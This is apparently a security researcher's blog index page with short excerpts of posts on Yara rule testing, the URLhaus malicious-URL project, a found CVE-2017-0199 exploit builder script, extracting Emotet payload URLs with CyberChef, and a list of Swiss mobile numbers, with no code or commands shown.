Did it happen to you that you wanted to quickly test a Yara rule you created, but you are missing a large enough data set to test your rule against? This is exactly what Yara Scan is designed for. You submit your Yara rule to the service and a short while later you will receive […]
Continue Readingabuse.ch launches URLhaus, collection of malicious URLs
abuse.ch has recently launched a new project called “URLhaus”. URLhaus is a project with the goal of sharing malicious URLs that are being used for malware distribution. Anybody can register with a Twitter account and share malicious URLs they have detected. The system will download and analyse the payload (trying to identify it) and then […]
Continue ReadingCVE-2017-0199 Exploit Builder Python Script
On Monday morning I came across a domain which has directory listening open for several subfolders. In most of the folders a Office Word document called “decoy.doc”, a PDF document named “p.doc” (yes, really), an exe and a Python script called “prothemusL_H.py” could be found: That Python script made me curious and I decided to […]
Continue ReadingExtracting Payload Urls From Office Docs With CyberChef
For several months now, Emotet has been using various Office document fields (e.g. Author, Comments) for “hiding” their PowerShell code to download the exe payload. The actors behind the malware often change little things in their code to make automated extraction of urls harder. On November 8th a friend asked me for help on a […]
Continue ReadingDownloadable List of all Swiss Mobile Phone Numbers
This is more of a fun post. I needed a list off all Swiss mobile phone numbers. I created a list for all currently used “area codes” 076-079 and decided to share the text files with anyone. 075 is currently not really used by Swisscom, though it was announced they will start to use the […]
Continue Reading